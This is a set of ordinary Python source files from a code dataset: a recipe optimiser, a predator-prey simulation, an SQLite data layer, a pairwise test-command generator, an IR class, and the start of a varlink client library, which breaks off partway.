durability 0, flavor 4, texture 0, calories 1\nChocolate: capacity 0, durability 0, flavor -2, texture 2, calories 8\n\nc = sugar*3 - sprinkles*3 - candy\nd = sprinkles*3\nf = candy*4 - chocolate*2\nt = chocolate*2 - sugar*3\n\n'''\nhigh = 0\nrecipe = None\nfor iCandy in range(1, 101):\n counts = {'Candy': iCandy}\n for iSprinkles in range(1, 101-iCandy):\n counts['Sprinkles'] = iSprinkles\n for iSugar in range(1, 101-(iCandy+iSprinkles)):\n counts['Sugar'] = iSugar\n counts['Chocolate'] = 100 - (iCandy+iSprinkles+iSugar)\n\n capacity = counts['Sugar']*3 - counts['Sprinkles']*3 - counts['Candy']\n durability = counts['Sprinkles']*3\n flavor = counts['Candy']*4 - counts['Chocolate']*2\n texture = counts['Chocolate']*2 - counts['Sugar']*3\n calories = counts['Sugar']*2 + counts['Sprinkles']*9 + counts['Candy'] + counts['Chocolate']*8\n\n if calories == 500:\n score = max(0, capacity) * max(0, durability) * max(0, flavor) * max(0, texture)\n if score > high:\n high = score\n recipe = counts.copy()\n\nprint(high)\n","sub_path":"15-2.py","file_name":"15-2.py","file_ext":"py","file_size_in_byte":1346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"376246834","text":"import random\r\nimport time\r\n\r\n# array\r\n\r\nanimals = []\r\n\r\n# classes\r\n\r\nclass Animal:\r\n def __init__(self, frailty, gender):\r\n self.frailty = frailty\r\n self.gender = gender\r\n self.age = 0\r\n self.die = False\r\n self.days_not_eaten = 0\r\n self.pregnant = False\r\n self.pregnancy = 0\r\n\r\n def disease(self):\r\n chance = 1 - (self.frailty / 100)\r\n\r\n if chance > 0.5:\r\n d = random.randint(0, 50)\r\n if d > 45:\r\n self.die = True\r\n\r\n if chance > 0.8:\r\n d = random.randint(0, 50)\r\n if d > 30:\r\n self.die = True\r\n\r\n def feed(self):\r\n food = random.randint(100, 10000)\r\n food_eaten = 0\r\n chance = 1 - (self.frailty / 100)\r\n\r\n if chance >= 0.8:\r\n d = random.randint(0, 50)\r\n if d > 10:\r\n food_eaten += 1\r\n food -= 1\r\n else:\r\n self.frailty += 1\r\n\r\n if chance > 0.8:\r\n d = random.randint(0, 50)\r\n if d > 30:\r\n food_eaten += 1\r\n 
food -= 1\r\n else:\r\n self.frailty += 1\r\n\r\n if chance < 0.5:\r\n d = random.randrange(0, 50)\r\n if d > 45:\r\n food_eaten += 1\r\n food -= 1\r\n else:\r\n self.frailty += 1\r\n\r\n old_frailty = self.frailty\r\n self.frailty -= food_eaten\r\n\r\n if old_frailty == self.frailty:\r\n self.days_not_eaten += 1\r\n\r\n def update(self):\r\n self.age += 1\r\n if self.age > 360:\r\n self.frailty += 1\r\n\r\n if self.gender == \"F\":\r\n self.pregnancy += 1\r\n\r\n# types of animal\r\n\r\nclass Rabbit(Animal):\r\n def animal_type(self):\r\n return \"Rabbit\"\r\n\r\n def breed(self):\r\n if self.frailty <= 50 and self.gender == \"F\" and self.age > 7:\r\n chance = random.randint(0, 100)\r\n if chance > 60:\r\n self.pregnant = True\r\n\r\n def check_birth(self):\r\n if self.pregnancy == 30 and self.gender == \"F\":\r\n self.pregnant = False\r\n self.pregnancy = 0\r\n litter = 0\r\n for i in range(1, random.randint(4, 12)):\r\n animals.append(genAnimal(\"Rabbit\"))\r\n litter += 1\r\n print(\" >> A rabbit gave birth to a litter of \" + str(litter) + \" pups.\")\r\n\r\nclass Fox(Animal):\r\n def animal_type(self):\r\n return \"Fox\"\r\n\r\n def breed(self):\r\n if self.frailty <= 30 and self.gender == \"F\" and self.age > 28:\r\n chance = random.randint(0, 100)\r\n if chance > 80:\r\n self.pregnant = True\r\n\r\n def check_birth(self):\r\n if self.pregnancy == 30 and self.gender == \"F\":\r\n self.pregnant = False\r\n self.pregnancy = 0\r\n litter = 0\r\n for i in range(1, random.randint(2,4)):\r\n animals.append(genAnimal(\"Fox\"))\r\n litter += 1\r\n print(\" >> A fox gave birth to a litter of \" + str(litter) + \" pups.\")\r\n\r\n def hunt(self, r):\r\n for rabbit in r:\r\n\r\n try:\r\n if r[r.index(rabbit)][1] > 40:\r\n chance = random.randint(0, 100)\r\n if chance > 87:\r\n del animals[r[r.index(rabbit)][0]]\r\n print(\" >> A rabbit was hunted by a fox.\")\r\n\r\n else:\r\n chance = random.randint(0, 100)\r\n if chance > 94:\r\n del animals[r[r.index(rabbit)][0]]\r\n print(\" >> A rabbit was hunted by a fox.\")\r\n\r\n except IndexError:\r\n continue\r\n\r\n def feed(self):\r\n no_rabbits = 0\r\n rabbits_i = []\r\n\r\n for animal in animals:\r\n try:\r\n if animal.animal_type() == \"Rabbit\":\r\n no_rabbits += 1\r\n rabbits_i.append([animals.index(animal), animal.frailty])\r\n\r\n except AttributeError:\r\n continue\r\n\r\n food = no_rabbits\r\n food_eaten = 0\r\n chance = 1 - (self.frailty / 100)\r\n\r\n if chance >= 0.8:\r\n d = random.randint(0, 50)\r\n if d > 10:\r\n self.hunt(rabbits_i)\r\n food_eaten += 1\r\n food -= 1\r\n else:\r\n self.frailty += 1\r\n\r\n if chance > 0.8:\r\n d = random.randint(0, 50)\r\n if d > 30:\r\n self.hunt(rabbits_i)\r\n food_eaten += 1\r\n food -= 1\r\n else:\r\n self.frailty += 1\r\n\r\n if chance < 0.5:\r\n d = random.randrange(0, 50)\r\n if d > 45:\r\n self.hunt(rabbits_i)\r\n food_eaten += 1\r\n food -= 1\r\n else:\r\n self.frailty += 1\r\n\r\n old_frailty = self.frailty\r\n self.frailty -= food_eaten\r\n\r\n if old_frailty == self.frailty:\r\n self.days_not_eaten += 1\r\n\r\n# functions\r\n\r\ndef genAnimal(type):\r\n chance = random.randint(0, 100)\r\n g = [\"F\", \"M\"]\r\n\r\n if chance >= 99 and type in [\" \", \"Fox\"]:\r\n frailty = random.randint(0, 5)\r\n gender = random.choice(g)\r\n return Fox(frailty, gender)\r\n\r\n if chance < 99 and type in [\" \", \"Rabbit\"]:\r\n frailty = random.randint(0, 20)\r\n gender = random.choice(g)\r\n return Rabbit(frailty, gender)\r\n\r\ndef randomGen():\r\n global animals\r\n for i in range(1, 
random.randint(10, 1000)):\r\n animals.append(genAnimal(\" \"))\r\n\r\ndef report(no_rabbits_dead, no_foxes_dead, no_rabbits, no_foxes, week):\r\n print(\"\\n\")\r\n print(\" >> WEEK \" + str(week) + \" REPORT <<\" + \"\\n\")\r\n \r\n print(\" >> Total number of animals: \" + str(no_rabbits + no_foxes))\r\n print(\" >> Total number of rabbits: \" + str(no_rabbits))\r\n print(\" >> Total number of foxes: \" + str(no_foxes))\r\n print(\" >> Total number of dead animals: \" + str(no_rabbits_dead + no_foxes_dead))\r\n print(\" >> Total number of dead rabbits: \" + str(no_rabbits_dead))\r\n print(\" >> Total number of dead foxes: \" + str(no_foxes_dead))\r\n\r\n print(\"\\n\")\r\n\r\n# logic\r\n\r\nweek = 0\r\n\r\nrandomGen()\r\n\r\nno_rabbits_dead = 0\r\n\r\nno_foxes_dead = 0\r\n\r\nno_rabbits = 0\r\n\r\nno_foxes = 0\r\n\r\nwhile True:\r\n\r\n length = len(animals)\r\n\r\n for animal in list(animals): # iterate over a copy so dead animals can be removed safely below\r\n\r\n if isinstance(animal, Animal) == True:\r\n animal.update()\r\n animal.disease()\r\n animal.feed()\r\n animal.breed()\r\n animal.check_birth()\r\n\r\n else:\r\n continue\r\n\r\n if animal.die == True:\r\n if animal.animal_type() == \"Rabbit\":\r\n no_rabbits_dead += 1\r\n\r\n if animal.animal_type() == \"Fox\":\r\n no_foxes_dead += 1\r\n\r\n animals.remove(animal)\r\n continue\r\n\r\n if animal.die == False:\r\n if animal.animal_type() == \"Rabbit\":\r\n no_rabbits += 1\r\n\r\n if animal.animal_type() == \"Fox\":\r\n no_foxes += 1\r\n\r\n if animal.days_not_eaten == 3:\r\n animals.remove(animal)\r\n continue\r\n\r\n if no_foxes + no_rabbits == 0:\r\n print(\"\\n | SIMULATION OVER |\")\r\n print(\"\\n >> All the animals have died!\")\r\n break\r\n\r\n if animals[0].age % 7 == 0: # does report each week\r\n\r\n week += 1\r\n time.sleep(1)\r\n report(no_rabbits_dead, no_foxes_dead, no_rabbits, no_foxes, week)\r\n\r\n no_rabbits_dead = 0\r\n\r\n no_foxes_dead = 0\r\n\r\n no_rabbits = 0\r\n\r\n no_foxes = 0\r\n\r\n","sub_path":"Breeding Like Rabbits.py","file_name":"Breeding Like Rabbits.py","file_ext":"py","file_size_in_byte":7665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"244435405","text":"import sqlite3\nfrom collections import namedtuple\n\n\ndef make_db(clear=None):\n with sqlite3.connect('company.db3') as conn:\n cursor = conn.cursor()\n if clear is not None:\n cursor.execute('drop table if exists terminal;')\n cursor.execute('drop table if exists debit;')\n cursor.execute('drop table if exists credit;')\n cursor.execute('drop table if exists partner;')\n cursor.execute('drop table if exists payment;')\n cursor.execute('''create table if not exists terminal (\n id INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL,\n configuration TEXT,\n title TEXT,\n comment TEXT,\n pub_key TEXT);\n ''')\n\n cursor.execute('''create table if not exists partner (\n id INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL,\n title TEXT,\n comment TEXT);\n ''')\n\n cursor.execute('''create table if not exists debit (\n id INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL,\n agent_id INT,\n datetime TEXT,\n summ INT,\n FOREIGN KEY (agent_id) REFERENCES partner(id));\n ''')\n\n cursor.execute('''create table if not exists credit (\n id INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL,\n agent_id INT,\n datetime TEXT,\n summ INT,\n FOREIGN KEY (agent_id) REFERENCES partner(id));\n ''')\n cursor.execute('''create table if not exists payment (\n id INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL,\n datetime TEXT,\n terminal_id INT,\n transaction_id INT,\n partner_id INT,\n summ INT,\n FOREIGN KEY (terminal_id) 
REFERENCES terminal(id),\n FOREIGN KEY (partner_id) REFERENCES partner(id));\n ''')\n\n\nTerminal = namedtuple('Terminal', ('id_', 'configuration', 'title',\n 'comment', 'pub_key'))\nPartner = namedtuple('Partner', ('id_', 'title', 'comment'))\nDebet = namedtuple('Debet', ('id_', 'agent_id', 'datetime', 'summ'))\nCredit = namedtuple('Credit', ('id_', 'agent_id', 'datetime', 'summ'))\nPayment = namedtuple('Payment', ('id_', 'datetime', 'terminal_id',\n 'transaction_id', 'partner_id', 'summ'))\n\n\ndef db_connect():\n conn = sqlite3.connect('company.db3')\n return conn\n\n\nclass TerminalDb:\n def __init__(self):\n self.conn = db_connect()\n self.cursor = self.conn.cursor()\n\n def write_to_terminal(self, terminal):\n try:\n self.cursor.execute('''insert into `terminal` (`configuration`,\n `title`, `comment`, `pub_key`)\n values(?, ?, ?, ?);''',\n (terminal.configuration, terminal.title,\n terminal.comment, terminal.pub_key))\n self.conn.commit()\n except:\n self.conn.rollback()\n\n def get_all_terminals(self):\n self.cursor.execute('''select * from `terminal`;''')\n result = self.cursor.fetchall()\n return result\n\n def get_terminal_by_id(self, id_):\n self.cursor.execute('''select * from `terminal` where id = ?;''',\n (id_, ))\n result = self.cursor.fetchone()\n return result\n\n\nclass PartnerDb:\n def __init__(self):\n self.conn = db_connect()\n self.cursor = self.conn.cursor()\n\n def write_to_partner(self, partner):\n try:\n self.cursor.execute('''insert into `partner`\n (`title`, `comment`)\n values(?, ?);''', (partner.title,\n partner.comment))\n self.conn.commit()\n except:\n self.conn.rollback()\n\n def get_all_partners(self):\n self.cursor.execute('''select * from `partner`;''')\n result = self.cursor.fetchall()\n return result\n\n def get_partner_by_id(self, id_):\n self.cursor.execute('''select * from `partner` where id = ?;''',\n (id_, ))\n result = self.cursor.fetchone()\n return result\n\n\nclass PaymentDb:\n def __init__(self):\n self.conn = db_connect()\n self.cursor = self.conn.cursor()\n\n def write_to_payment(self, payment):\n try:\n self.cursor.execute('''insert into `payment`\n (`datetime`,\n `terminal_id`,\n `transaction_id`,\n `partner_id`,\n `summ`)\n values(?, ?, ?, ?, ?);''',\n (payment.datetime,\n payment.terminal_id,\n payment.transaction_id,\n payment.partner_id,\n payment.summ))\n self.conn.commit()\n except:\n self.conn.rollback()\n\n def get_all_payments(self):\n self.cursor.execute('''select * from `payment`;''')\n result = self.cursor.fetchall()\n return result\n\n\nclass CreditDb:\n pass\n\n\nclass DebetDb:\n pass\n\n\nclass TerminalWorker:\n def __init__(self, repository):\n self.repository = repository\n\n def write_to_terminal(self, terminal):\n self.repository.write_to_terminal(terminal)\n\n def get_terminal_by_id(self, id_):\n return Terminal(*self.repository.get_terminal_by_id(id_))\n\n def get_all_terminals(self):\n return self.repository.get_all_terminals()\n\n def delete_terminal_by_id(self):\n pass\n\n\nclass PartnerWorker:\n def __init__(self, repository):\n self.repository = repository\n\n def write_to_partner(self, partner):\n self.repository.write_to_partner(partner)\n\n def get_all_partners(self):\n return self.repository.get_all_partners()\n\n def get_partner_by_id(self, id_):\n return Partner(*self.repository.get_partner_by_id(id_))\n\n def delete_partner_by_id(self):\n pass\n\n\nclass PaymentWorker:\n def __init__(self, repository):\n self.repository = repository\n\n def write_to_payment(self, payment):\n 
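# [Editor's aside, not in the original file] the Worker classes only
# delegate to the repository they are constructed with, so a caller
# wires the layers together roughly like this (a hedged usage sketch;
# the Payment namedtuple fields are the ones defined above):
#   pw = PaymentWorker(PaymentDb())
#   pw.write_to_payment(Payment(None, '2020-01-01 12:00', 1, 42, 1, 100))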
self.repository.write_to_payment(payment)\n\n def get_all_payment(self):\n return self.repository.get_all_payments()\n\n def get_payment_by_id(self):\n pass\n\n\n\ndef main():\n pass\n # make_db(clear=1)\n # t = Terminal(\"00\", \"{'key': 'Value''}\", \"Terminal1\", \"Term1\", \"KEY\")\n # print(t)\n # tr = TerminalDb()\n # tw = TerminalWorker(tr)\n\n # for i in range(2, 20):\n # t = Terminal(\"00\", \"{'key': 'Value''}\", \"Terminal{}\".format(i), \"Term{}\".format(i), \"KEY\")\n # print(t)\n # tw.write_to_terminal(t)\n # t = tw.get_all_terminals()\n pr = PartnerDb()\n pw = PartnerWorker(pr)\n\n # for i in range(1, 20):\n # p = Partner(\"00\", \"Company{}\".format(i), \"Comment\")\n # print(p)\n # pw.write_to_partner(p)\n p = pw.get_all_partners()\n print(p)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"lesson_3/hw3/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":7631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"91514711","text":"# coding : utf-8\nimport sys\nfrom random import sample\n\n\n# classe argument : permet de verifier si un argument est un flag, et quelles valeurs sont possibles\nclass Argument:\n # constructeur\n def __init__(self, name, is_flag, values):\n self.name = name\n self.is_flag = is_flag\n if is_flag:\n self.values = [\"_on\", \"_off\"]\n else:\n self.values = values\n\n\nclass TestSet:\n \"\"\"\n class constructing a set of permutations of arguments to call on an application to execute a pairwise\n cover test.\n \"\"\"\n\n def __init__(self, app_name, file_args, file_consts, file_commands):\n \"\"\"\n constructor\n :param app_name: the string to call to execute the app without arguments\n :param file_args: path to file containing the possible arguments for the app and their values\n :param file_consts: path to file containing the constraints defining forbidden combinations\n of arguments and values in conjunction.\n \"\"\"\n self.app_name = app_name\n if self.app_name.isspace():\n raise Exception(\"app_name empty\")\n self.file_args = file_args\n self.file_consts = file_consts\n self.file_commands = file_commands\n self.arguments = []\n # constraint separation, between binary constraints, and N-ary constraints\n self.complex_constraints = []\n self.pair_constraints = []\n # pairs still to be satisfied\n self.pairs = []\n # permutations of arguments to be tested for a coverage test\n self.permutations = []\n self.cover = []\n\n # initialisation of object according to files content\n self.create_list_arg()\n self.create_list_constraints()\n self.build_pairs_to_cover()\n\n def create_list_arg(self):\n\n \"\"\"\n extraction of arg_file into the form of a list of Arguments\n \"\"\"\n try:\n f = open(self.file_args, 'r')\n except FileNotFoundError:\n print(\"No arguments file found at specified path\", file=sys.stderr)\n exit(1)\n\n # split the lines of the file into a list\n lignes = f.readlines()\n f.close()\n\n for ligne in lignes:\n # drop empty lines\n if ligne.isspace():\n continue\n values = ligne.split()\n # catching the name of the argument described by the current line\n nom = values.pop(0)\n # ignoring help flag\n if nom == '-h':\n continue\n if not values:\n raise Exception(\"Empty values for argument in argument file, non compatible file\")\n # build argument object and add it to the list\n self.arguments.append(Argument(nom, values[0] == 'flag', values))\n # sorting decreasingly according to the number of parameters\n self.arguments.sort(key=lambda x: len(x.values), 
reverse=True)\n\n def create_list_constraints(self):\n \"\"\"\n conversion of the constraint file, taking conjunctions expressed in the file\n to a list of constraints on arguments permutations, expressed in tuples of form\n (arg1, val1, arg2, val2...) in which all the arguments arg of value val are incompatible altogether\n \"\"\"\n\n # recuperation du fichier de contraintes\n try:\n f = open(self.file_consts, 'r')\n except FileNotFoundError:\n print(\"no constraint file found\")\n return\n\n constraints = f.readlines()\n f.close()\n\n # on traite chaque contrainte puis on l'ajoute a la liste des contraintes\n for constraint in constraints:\n if constraint.isspace():\n continue\n tokens = constraint.split()\n line = []\n arg_ctr = 0\n # on traite chacune des valeurs de la contrainte :\n # - si c'est un flag, on lui ajoute la valeur _on\n # - sinon, on recupere la valeur fournie\n while tokens:\n nom = tokens.pop(0)\n arg_ctr += 1\n for e in self.arguments:\n if ('-' + nom) == e.name:\n if e.is_flag:\n line.append((nom, \"_on\"))\n else:\n try:\n val = tokens.pop(0)\n except IndexError:\n \"\"\"\n if conflict in this part it means that the current argument should have been a flag\n according to the constraint file, but is registered as a binary argument in argument\n file.\n \"\"\"\n print(\"--------------------------------------------\\n\" +\n \"constraint file inconsistent with arguments.\\n\" +\n \"--------------------------------------------\", file=sys.stderr)\n exit(1)\n\n line.append((nom, val))\n break\n\n # separation of constraints: pairs for direct elimination of pairs to cover, complex for later use\n if arg_ctr == 2:\n self.pair_constraints.append(set(line))\n else:\n self.complex_constraints.append(set(line))\n\n def build_pairs_to_cover(self):\n \"\"\"\n function populating the list of pairs that are to be tested for the application\n ( 2-combination of the set of parameters )\n \"\"\"\n argc = len(self.arguments)\n for i in range(argc):\n for value1 in self.arguments[i].values:\n for j in range(i + 1, argc):\n for value2 in self.arguments[j].values:\n self.pairs.append({(self.arguments[i].name, value1), (self.arguments[j].name, value2)})\n\n def delete_matched_pairs(self, permutation):\n \"\"\"\n deletion of pairs that are matched by a set of couple (argument, value)\n :param permutation: set of couple (argument, value) to evaluate for the match\n \"\"\"\n for pair in self.pairs:\n if pair.issubset(permutation):\n self.pairs.remove(pair)\n\n def is_transgressing_constraint(self, permutation):\n \"\"\"\n tests a permutation for constraint infringement\n :param permutation: permutation to test\n :return: True if the permutation is invalid regarding the constraints, False else\n \"\"\"\n for constraint in self.pair_constraints:\n if constraint.issubset(permutation):\n return True\n for constraint in self.complex_constraints:\n if constraint.issubset(permutation):\n return True\n return False\n\n def eval_permutation(self, permutation):\n \"\"\"\n :param permutation: (argument, value)list permutation\n :return: number of yet unmatched pairs ((arg1, val1), (arg2, val2)) matched by this permutation.\n \"\"\"\n return sum([pair <= permutation for pair in self.pairs])\n\n def get_valid_arg(self, permutation, exploration_window=10):\n \"\"\"\n :param permutation: permutation to which we want to add a new (argument, value) couple\n :param exploration_window: the number of valid arguments for this set to be compared\n :return: the most effective couple in term of matching pairs in 
pairs yet to cover\n \"\"\"\n # select_ctr: number of valid args tested for the current permutation\n select_ctr = 0\n # number of pairs matched by the most effective valid new argument\n max_sat = 0\n # most effective new arg to add to the permutation\n selected = None\n # list of arg names already presents in the permutation\n permutation_args = [argval[0] for argval in permutation]\n\n # foreach pairs (set of two (arg, val) tuples) non matched\n for pair in self.pairs:\n list_pair = list(pair)\n \"\"\"\n if the first (arg, val) in pair is in the permutation, and the second argument isn't set yet in the\n permutation, or vice versa, add temporarily the argument to check if the new member doesn't make the\n permutation illegal according to constraints, if not then evaluate the effectiveness on the reduction\n of unmatched pairs number. save the best score and (arg, val) corresponding at each iteration.\n \"\"\"\n if (list_pair[0] in permutation and list_pair[1][0] not in permutation_args) or \\\n (list_pair[1] in permutation and list_pair[0][0] not in permutation_args):\n first = list_pair[0] in permutation\n permutation_tmp = set(permutation)\n permutation_tmp.add(list_pair[first])\n if not self.is_transgressing_constraint(permutation_tmp):\n sat = self.eval_permutation(permutation_tmp)\n if sat > max_sat:\n max_sat = sat\n selected = list_pair[first]\n select_ctr += 1\n # break when we reached the depth of exploration we specified\n if select_ctr >= exploration_window:\n break\n return selected\n\n def build_args_permutations_grow(self, exploration_window=10):\n \"\"\"\n first phase of permutation set generation, building a covering set of possibly incomplete arguments permutations\n :param exploration_window: argument propagation to get_valid_arg\n \"\"\"\n # while all the 2-combination of arguments isn't matched\n while self.pairs:\n # if there is already a permutation in the set, try to expand it, else pick the first unmatched pair\n if self.permutations:\n permutation_seed = self.permutations.pop(0)\n else:\n permutation_seed = self.pairs.pop(0)\n permutation_seed = set(permutation_seed)\n # if the permutation isn't complete try to expand it, else add it to the covering set\n if len(permutation_seed) < len(self.arguments):\n new_arg = self.get_valid_arg(permutation_seed, exploration_window)\n # if the permutation isn't growing anymore, store it in queue of self.permutation for later treatment\n if new_arg is None:\n self.permutations.append(permutation_seed)\n self.permutations.insert(0, set(self.pairs.pop(0)))\n continue\n permutation_seed.add(new_arg)\n self.delete_matched_pairs(permutation_seed)\n self.permutations.insert(0, permutation_seed)\n else:\n self.cover.append(permutation_seed)\n\n def build_args_permutations(self, exploration_window=10, recombination_threshold=10, repetitions=3):\n \"\"\"\n method building the set of covering permutations\n\n :param exploration_window: number of valid arguments to be tested during the growing of permutations at\n each iteration\n :param recombination_threshold: threshold size at which the heuristic tries to recombine a permutation with\n another smaller one\n :param repetitions: number of passes of welding_short_permutations\n \"\"\"\n self.build_args_permutations_grow(exploration_window)\n self.weld_short_permutations(recombination_threshold, repetitions)\n # queueing the incomplete permutations to the cover table\n self.cover.extend(self.permutations)\n self.permutations.clear()\n\n def weld_short_permutations(self, 
recombination_threshold, repetitions):\n \"\"\"\n try to combine all the permutations shorter than a certain size, trying to reduce the final set\n :param recombination_threshold: threshold size\n :param repetitions: number of passes on all the permutations\n \"\"\"\n # multiple passes for more compact set of permutations\n for _ in range(repetitions):\n \"\"\"\n foreach incomplete permutation shorter than threshold recombine with another permutation not containing\n any of its own arguments\n \"\"\"\n for permutation1 in self.permutations:\n if len(permutation1) < recombination_threshold:\n args1 = set([arg for (arg, val) in permutation1])\n for permutation2 in self.permutations:\n args2 = set([arg for (arg, val) in permutation2])\n if args1.isdisjoint(args2):\n permutation_tmp = permutation1.union(permutation2)\n if not self.is_transgressing_constraint(permutation_tmp):\n self.permutations.append(permutation_tmp)\n self.permutations.remove(permutation1)\n self.permutations.remove(permutation2)\n break\n\n def complete_short_permutations(self):\n \"\"\"\n to be executed at the end of build_args_permutations: completes non significant missing arguments of\n permutations with random values\n \"\"\"\n\n for permutation in self.cover:\n args_in = [arg for arg, val in permutation]\n if len(permutation) < len(self.arguments):\n for argument in self.arguments:\n if argument.name not in args_in:\n if not argument.is_flag:\n permutation.add((argument.name, sample(argument.values, 1)[0]))\n args_in.append(argument.name)\n\n def generate_commands(self):\n \"\"\"\n generation (or overwrite) of the file (specified in self.const_file) containing the set of commands.\n \"\"\"\n f = open(self.file_commands, 'w')\n for permutation in self.cover:\n command = self.app_name\n for (arg, val) in permutation:\n # if value is _off - meaning the absence of flag - skip to the next argument\n if val == '_off':\n continue\n # if value is _on only put the flag name\n elif val == '_on':\n command += \" \" + arg\n # case of negative value of negative numeric argument (- prefix messing with bash)\n elif val[0] == '-':\n command += ' {} \"{}\"'.format(arg, val)\n else:\n command += \" {} {}\".format(arg, val)\n\n command += '\\n'\n f.write(command)\n\n def build_pairs_from_command(self, command):\n \"\"\"\n regenerate pairs covered by a command, for coverage control\n :param command: said command\n :return : the pairs covered by the command\n \"\"\"\n\n # args listed in the command\n args = []\n\n # generation of couples (arg, val) from the command\n if not command.isspace():\n tokens = command.split()\n # first token is app_name\n tokens.pop(0)\n # for all arguments in command build (arg, val) couple\n while tokens:\n nom = tokens.pop(0)\n for e in self.arguments:\n if nom == e.name:\n if e.is_flag:\n args.append((nom, \"_on\"))\n else:\n val = tokens.pop(0)\n # purge of quotes added on arguments values starting with \"-\"\n val = val.replace('\\\"', '')\n args.append((nom, val))\n break\n # adjunction of non present flags\n args_names = [nom for nom, val in args]\n for argument in self.arguments:\n if argument.is_flag and argument.name not in args_names:\n args.append((argument.name, \"_off\"))\n # 2-combination of (arg, val) couples == pairs covered by the command\n pairs = []\n while args:\n arg1 = args.pop(0)\n for arg2 in args:\n pair = {arg1, arg2}\n if not self.is_transgressing_constraint(pair):\n pairs.append({arg1, arg2})\n return pairs\n\n def check_cover(self):\n \"\"\"\n control method to ensure that the set 
of commands generated is pairwise covering\n \"\"\"\n # regenerate pairs to cover\n self.build_pairs_to_cover()\n try:\n f = open(self.file_commands, 'r')\n except FileNotFoundError:\n print(\"Problem occurred between generation and checking:\\n\"\n \" commands_file has been deleted or made unreadable\", file=sys.stderr)\n exit(1)\n commands = f.readlines()\n # foreach commands in the commands_file regenerate pairs covered by it, and delete them from the pairs to cover\n for command in commands:\n pairs = self.build_pairs_from_command(command)\n for pair in pairs:\n try:\n while True:\n self.pairs.remove(pair)\n except ValueError:\n pass\n # if remaining pairs, generation is faulty\n if self.pairs:\n print(\"the command set generated isn't pairwise covering\", file=sys.stderr)\n exit(1)\n\n\ndef usage():\n print(\"question1.py <app_name> <file_args> <file_consts> <file_commands>\")\n print(\"with:\")\n print(\" <app_name> = path of application invocation without parameters\")\n print(\" <file_args> = file containing the arguments and their possible values\")\n print(' <file_consts> = file containing the constraints to apply on pairwise cover')\n print(\" <file_commands> = file regrouping all the commands generated\")\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) != 5:\n usage()\n exit(1)\n\n ts = TestSet(sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4])\n thresh = 9 * len(ts.arguments) / 10\n ts.build_args_permutations(exploration_window=10, recombination_threshold=thresh)\n ts.complete_short_permutations()\n ts.generate_commands()\n ts.check_cover()\n","sub_path":"TP2/question1.py","file_name":"question1.py","file_ext":"py","file_size_in_byte":18372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"127598913","text":"from Quadruple import Quadruple\n\nclass ReturnIR(Quadruple):\n # return y\n def __init__(self, y):\n super(ReturnIR, self).__init__()\n self.op = \"return\"\n self.arg1 = y\n self.arg2 = None\n self.result = None\n\n def __str__(self):\n return (self.op + \" \" + self.arg1)\n ","sub_path":"IR_PAI/ReturnIR.py","file_name":"ReturnIR.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"395276958","text":"#!/usr/bin/python3\n\n\"\"\"An implementation of the varlink protocol\n\nSee http://varlink.org for more information about the varlink protocol and interface definition files.\n\nFor service implementations use the SimpleServer() class, for client implementations use the Client() class.\n\n\"\"\"\n\nimport collections\nimport json\nimport os\nimport re\nimport select\nimport signal\nimport socket\nimport traceback\nfrom types import (SimpleNamespace, GeneratorType)\nfrom inspect import signature\nimport sys\n\nclass VarlinkEncoder(json.JSONEncoder):\n def default(self, o):\n if isinstance(o, SimpleNamespace):\n return o.__dict__\n if isinstance(o, VarlinkError):\n return o.as_dict()\n return json.JSONEncoder.default(self, o)\n\nclass VarlinkError(Exception):\n \"\"\"The base class for varlink error exceptions\"\"\"\n def __init__(self, message, namespaced = False):\n if not namespaced and not isinstance(message, dict):\n raise TypeError\n # normalize to dictionary\n super().__init__(json.loads(json.dumps(message, cls=VarlinkEncoder)))\n\n def error(self):\n \"\"\"returns the exception varlink error name\"\"\"\n return self.args[0]['error']\n\n def parameters(self, namespaced = False):\n \"\"\"returns the exception varlink error parameters\"\"\"\n if namespaced:\n return json.loads(json.dumps(self.args[0]['parameters']), 
object_hook=lambda d: SimpleNamespace(**d))\n else:\n return self.args[0]['parameters']\n\n def as_dict(self):\n return self.args[0]\n\nclass InterfaceNotFound(VarlinkError):\n \"\"\"The standardized varlink InterfaceNotFound error as a python exception\"\"\"\n def __init__(self, interface):\n VarlinkError.__init__(self, {'error': 'org.varlink.service.InterfaceNotFound', 'parameters': {'interface': interface}})\n\nclass MethodNotFound(VarlinkError):\n \"\"\"The standardized varlink MethodNotFound error as a python exception\"\"\"\n def __init__(self, method):\n VarlinkError.__init__(self, {'error': 'org.varlink.service.MethodNotFound', 'parameters': {'method': method}})\n\nclass MethodNotImplemented(VarlinkError):\n \"\"\"The standardized varlink MethodNotImplemented error as a python exception\"\"\"\n def __init__(self, method):\n VarlinkError.__init__(self, {'error': 'org.varlink.service.MethodNotImplemented', 'parameters': {'method': method}})\n\nclass InvalidParameter(VarlinkError):\n \"\"\"The standardized varlink InvalidParameter error as a python exception\"\"\"\n def __init__(self, name):\n VarlinkError.__init__(self, {'error': 'org.varlink.service.InvalidParameter', 'parameters': {'parameter': name}})\n\nclass Client:\n \"\"\"Varlink client class.\n\n >>> from varlink import Client\n >>> client = Client(resolve_interface='io.systemd.journal')\n >>> print(client.get_interfaces()['io.systemd.journal'].get_description())\n # Query and monitor the log messages of a system.\n interface io.systemd.journal\n\n type Entry (cursor: string, time: string, message: string, process: string, priority: string)\n\n # Monitor the log. Returns the @initial_lines most recent entries in the\n # first reply and then continuously replies when new entries are available.\n method Monitor(initial_lines: int) -> (entries: Entry[])\n >>>\n >>> iface = client.open(\"io.systemd.journal\")\n\n iface now holds an object with all the varlink methods available.\n\n Do varlink method call with varlink arguments and a\n single varlink return struct wrapped in a namespace class:\n >>> ret 